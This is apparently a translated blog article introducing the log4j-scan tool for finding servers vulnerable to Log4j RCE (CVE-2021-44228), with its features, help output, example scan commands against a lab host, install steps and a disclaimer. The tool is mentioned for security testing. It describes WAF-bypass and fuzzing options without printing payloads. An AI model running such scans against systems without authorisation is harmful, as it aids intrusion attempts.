In this article, I will guide you to use the Log4j-scan tool, the most accurate and fully automatic scan tool to find vulnerable log4j servers.
Feature
- Supports list of URLs.
- Fuzzing for over 60 HTTP request headers (not just 3-4 headers like the tools have seen before).
- Fuzzing for HTTP parameters POST Data.
- Fuzzing for JSON parameters.
- Support DNS callback to detect and validate security holes.
- WAF bypass payloads.
Describe
The author has been researching Log4J RCE (CVE-2021-44228) since it was discovered and has been working to stop this vulnerability. The team has developed an open source scanning tool to detect and help developers patch the Log4J RCE CVE-2021-44228 vulnerability. This tool will be used by security teams to scan their infrastructure for Log4J RCE and also check for WAF bypasses that may lead to code execution on the project environment.
It supports instant OOB DNS callback, no need to set up DNS callback server.
Using
$ python3 log4j-scan.py -h
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
[--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Check a single URL.
-p PROXY, --proxy PROXY
Send requests through proxy. proxy should be specified in the format supported by requests
(http[s]://<proxy-ip>:<proxy-port>)
-l USEDLIST, --list USEDLIST
Check a list of URLs.
--request-type REQUEST_TYPE
Request Type: (get, post) - [Default: get].
--headers-file HEADERS_FILE
Headers fuzzing list - [default: headers.txt].
--run-all-tests Run all available tests on each URL.
--exclude-user-agent-fuzzing
Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.
--wait-time WAIT_TIME
Wait time after all URLs are processed (in seconds) - [Default: 5].
--waf-bypass Extend scans with WAF bypass payloads.
--test-CVE-2021-45046
Test using payloads for CVE-2021-45046 (detection payloads).
--dns-callback-provider DNS_CALLBACK_PROVIDER
DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].
--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST
Custom DNS Callback Host.
--disable-http-redirects
Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.
Scan Website
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local
Scan a single URL using all Request methods: GET, POST (url-encoded form), POST (body JSON)
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests
Find bypass WAF.
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass
Scan list of URLs
$ python3 log4j-scan.py -l urls.txt
How to install
$ pip3 install -r requirements.txtDocker support
git clone https://github.com/fullhunt/log4j-scan.git cd log4j-scan sudo docker build -t log4j-scan . sudo docker run -it --rm log4j-scan # With URL list "urls.txt" in current directory docker run -it --rm -v $PWD:/data log4j-scan -l /data/urls.txt
Disclaimer
This project is made for educational and pentest purposes only. It is illegal to use log4j-scan to attack targets without the prior consent of both parties. It is your responsibility to comply with all applicable laws of the country in which you live. The developers and Anonyviet will not bear any liability or damage caused by the article or the tool.
